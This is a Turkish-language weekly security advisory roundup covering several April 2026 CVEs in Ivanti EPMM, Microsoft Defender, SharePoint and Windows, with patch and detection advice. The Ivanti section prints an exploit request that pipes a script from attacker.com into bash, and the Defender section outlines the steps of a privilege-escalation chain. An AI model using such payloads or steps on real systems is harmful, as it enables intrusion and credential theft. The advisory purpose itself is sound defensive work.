Bu hafta sakin geçmedi.
CISA resmi alarm verdi ve federal kurumların elindeki bir sistemi 72 saat içinde yamalamalarını emretti. Bir güvenlik araştırmacısı, Microsoft’a bildirdiği açığın görmezden gelinmesine sinirlenip istismar kodunu GitHub’a koydu. Ve dünya genelindeki kurumsal mobil yönetim sunucuları, arkalarında kripto madencisi ve web shell bırakarak sessizce ele geçirildi.
CVE-2026-1340 & CVE-2026-1281 — Cebinizdeki Telefon Sunucusu
| Alan | Detay |
|---|---|
| Ürün | Ivanti Endpoint Manager Mobile (EPMM) |
| CVSS | 9.8 (Critical) × 2 |
| Tür | Unauthenticated Remote Code Execution |
| Durum | Aktif sömürü — CISA KEV’e eklendi (8 Nisan) |
| Yama | Ivanti EPMM v12.8 |
Ne?
Ivanti EPMM, kurumların çalışanlarına ait telefon ve tabletleri yönetmesini sağlayan bir sunucu yazılımı. Şirket cihazlarına uygulama dağıtmak, güvenlik politikası uygulamak, cihazları uzaktan silmek… hepsi bu sistem üzerinden yürür. Yani saldırgan bu sunucuya girerse, bir şirketin tüm mobil cihaz filosuna karşı eli kolu uzanır demektir.
Nasıl çalışıyor?
İkisi de aynı kök nedenden doğuyor: güvensiz bash script kullanımı. Sunucu, dışarıdan gelen HTTP isteklerini işlerken içerideki bash scriptlerine parametre geçiyor. Ama bu parametreler doğrulanmıyor.
Saldırgan özel hazırlanmış bir istek atıyor:
GET /mifs/c/aftstore/fob/?st=AAAA...&h=gPath['curl http://attacker.com/shell.sh | bash']Bash bu parametreyi işlerken aritmetik genişleme ([[ ]]) devreye giriyor ve h içindeki komutu çalıştırıyor. Kimlik doğrulama yok, önceden erişim yok. Tek bir HTTP isteği yeterli.
CVE-2026-1281 uygulama mağazası özelliğini (map-appstore-url), CVE-2026-1340 ise Android dosya transfer özelliğini (map-aft-store-url) vuruyor. İki farklı script, aynı hata.
Saldırganlar ne yaptı?
Unit 42’nin raporuna göre sömürüler büyük ölçüde otomatik ve yaygın. Sunucuya girdikten sonra saldırganların bıraktıkları:
/mi/tomcat/webapps/mifs/dizinine JSP web shell’ler (401.jsp,403.jsp,1.jsp)- Kalıcı arka kapı
- Kripto madencisi
- Nezha adlı izleme ajanı (uzaktan kontrol için)
Ne yapmalı?
Ivanti EPMM kullanıyorsanız: hemen v12.8’e güncelleyin. CISA, federal kurumların 11 Nisan’a kadar yamalamalarını zorunlu kıldı. Eğer sunucunuzda /mi/tomcat/webapps/mifs/ altında tanımadığınız .jsp dosyaları varsa, saldırı gerçekleşmiş olabilir.
CVE-2026-33825 — Koruyucu Kendisi Ele Geçirildi
| Alan | Detay |
|---|---|
| Ürün | Microsoft Defender Antimalware Platform |
| CVSS | 7.8 (High) |
| Tür | Local Privilege Escalation → SYSTEM |
| Durum | Kamuya açık PoC (BlueHammer) — Vahşide görülmedi |
| Yama | Defender Platform v4.18.26030.3011 (otomatik) |
Arka Plan
“Chaotic Eclipse” takma adını kullanan bir araştırmacı, bu açığı daha önce Microsoft’a bildirdi. Yanıt tatmin edici gelmeyince sinirini GitHub’a döktü: BlueHammer adını verdiği exploit kodunu herkese açık şekilde yayınladı.
Sonuç: yama yokken istismar kodu internette dolaşmaya başladı.
Ne yapıyor?
Yerel bir kullanıcı bu açığı kullanarak kendini NT AUTHORITY\SYSTEM seviyesine çıkarabiliyor. Adımlar şöyle işliyor:
- Volume Shadow Copy (VSS) üzerinden bir anlık görüntü alınıyor
- Cloud Files callback’leri ve oplock mekanizması kullanılarak Defender’ın güncelleme süreci tam doğru anda duraklatılıyor
- Bu an aralığında
SAM,SYSTEMveSECURITYregistry hive’ları okunabilir hale geliyor - NTLM hash’leri çözülüyor, yerel yönetici hesabı ele geçiriliyor
- SYSTEM shell açılıyor — sonra hash eski haline döndürülüyor, iz bırakılmıyor
Dikkat çekici olan: bu işlem Windows’un kendi meşru özelliklerini zincirleyerek gerçekleşiyor. Defender bunu “anormal” olarak algılamakta zorlanıyor çünkü her adım tek başına masum görünüyor.
Pratik risk
Uzaktan değil, yerel bir açık. Yani saldırganın önce sisteme bir şekilde girmesi gerekiyor (phishing, başka bir açık, fiziksel erişim). Girdikten sonra bu açıkla ayrıcalık yükseltiyor. Özellikle ransomware gruplarının ikinci aşama olarak kullandığı türden bir açık.
Ne yapmalı?
Defender güncellemeleri otomatik olarak geliyor, büyük ihtimalle sisteminiz zaten yamalı. Kontrol etmek için: Get-MpComputerStatus komutunu PowerShell’de çalıştırın, AMProductVersion değerinin 4.18.26030.3011 veya üzeri olduğunu doğrulayın.
CVE-2026-32201 — SharePoint Karanlıkta Çalışıyor
| Alan | Detay |
|---|---|
| Ürün | Microsoft SharePoint Server |
| CVSS | 6.5 (Medium) |
| Tür | Spoofing / Improper Input Validation |
| Durum | Vahşide aktif sömürü — CISA KEV’e eklendi |
| Yama | 14 Nisan Patch Tuesday |
CVSS 6.5 ama aktif sömürü — bu nasıl iş?
Puanı düşük görünüyor ama CISA bu açığı “Bilinen Sömürülen Açıklar” kataloğuna ekledi ve federal kurumların 28 Nisan’a kadar yamalamalarını istedi. Neden?
Açığın teknik kapsamı dar: saldırgan verinin nasıl görüntülendiğini manipüle edebiliyor. Doğrudan kod çalıştıramıyor, sistemi çökertemiyor. Ama sosyal mühendislik için mükemmel bir zemin.
SharePoint, kurumların iç dökümanlarını paylaştığı, proje yürüttüğü, birbirine güvenli bağlantı gönderdiği platform. Bu açıkla bir saldırgan, meşru görünen sahte içerik oluşturabiliyor. Kullanıcı “güvenilir iç platform”dan gelen bir linke tıklıyor, aslında saldırgana ait bir sayfaya gidiyor.
Fidye yazılımı gruplarının ilk erişim vektörü olarak kullandığı türden bir açık. Puanı düşük, etkisi zincirleme yüksek.
Ne yapmalı?
SharePoint Server kullanıyorsanız 14 Nisan yamasını bir an önce uygulayın. Kullanıcılarınızı SharePoint üzerinden gelen bağlantılara karşı uyarın, özellikle kimlik bilgisi isteyen sayfalara yönlendirenlere.
CVE-2026-33824 & CVE-2026-33827 — İkiz Bombalar
| Alan | Detay |
|---|---|
| Ürün | Windows IKE Service Extensions & Windows TCP/IP Stack |
| CVSS | 9.8 (Critical) × 2 |
| Tür | Unauthenticated Remote Code Execution |
| Durum | Yama var — vahşide görülmedi (henüz) |
| Yama | 14 Nisan Patch Tuesday |
Bu hafta Patch Tuesday öncesi sızıntı raporlarına giren iki açık, aynı CVSS puanını paylaşıyor: 9.8.
CVE-2026-33824 — Windows IKE
IKE (Internet Key Exchange), VPN bağlantılarında kullanılan bir protokol. Açık, IKEv2 etkin olan herhangi bir Windows makinesine özel hazırlanmış paketler göndererek kod çalıştırmayı mümkün kılıyor. Kimlik doğrulama yok, kullanıcı etkileşimi yok — sadece ağ erişimi yeterli. Temel neden: double free hatası (aynı bellek alanının iki kez serbest bırakılması).
Kurumsal ağlarda VPN altyapısı kuran Windows makineleri, internete açık IKEv2 portlarıyla bu açığa maruz kalıyor.
CVE-2026-33827 — Windows TCP/IP
Daha da temelde bir yerde: işletim sisteminin TCP/IP yığını. Windows makinesine özel hazırlanmış paketler göndererek kod çalıştırılabiliyor. CVSS 9.8, kimlik doğrulama yok. Tenable bu açığı “Exploitation More Likely” olarak işaretledi.
TCP/IP yığını açıkları tarihsel olarak worm’lar için mükemmel zemin. Hatırlayın: 2003’teki Blaster worm’u benzer bir Windows RPC açığından yayıldı ve saatler içinde yüz binlerce makineyi etkiledi.
Ne yapmalı?
Windows Update çalıştırın. Eğer Nisan Patch Tuesday yamasını henüz almadıysanız, özellikle internet tarafına açık Windows makineleriniz varsa öncelik verin.
Haftanın Özeti
| CVE | Ürün | CVSS | Tür | Aktif Sömürü |
|---|---|---|---|---|
| CVE-2026-1340 | Ivanti EPMM | 9.8 | Unauthenticated RCE | ✅ KEV |
| CVE-2026-1281 | Ivanti EPMM | 9.8 | Unauthenticated RCE | ✅ KEV |
| CVE-2026-33825 | Microsoft Defender | 7.8 | Local Privilege Escalation | ⚠️ PoC var |
| CVE-2026-32201 | Microsoft SharePoint | 6.5 | Spoofing | ✅ KEV |
| CVE-2026-33824 | Windows IKE | 9.8 | Unauthenticated RCE | ❌ |
| CVE-2026-33827 | Windows TCP/IP | 9.8 | Unauthenticated RCE | ❌ |
ACİL EYLEM LİSTESİ
- Ivanti EPMM → v12.8’e güncelleyin. Sonra
/mi/tomcat/webapps/mifs/altını tarayın.- Windows → Nisan Patch Tuesday yaması var mı kontrol edin.
- Defender →
Get-MpComputerStatusile platform versiyonunu doğrulayın.
Kaynaklar
- SecurityOnline — CVE Watchtower: April 6–12, 2026
- Tenable — Microsoft April 2026 Patch Tuesday
- BleepingComputer — April 2026 Patch Tuesday: 167 Flaws, 2 Zero-Days
- Unit 42 — Ivanti EPMM CVE-2026-1281 & CVE-2026-1340
- CISA — Ivanti EPMM KEV Uyarısı (8 Nisan 2026)
- SecurityAffairs — Ivanti EPMM CISA KEV
- Undercode Testing — CVE-2026-33825 BlueHammer
- The Hacker News — SharePoint Zero-Day CVE-2026-32201
- CrowdStrike — April 2026 Patch Tuesday Analysis
- CISA KEV Kataloğu
Bazı bilgiler güncel olmayabilir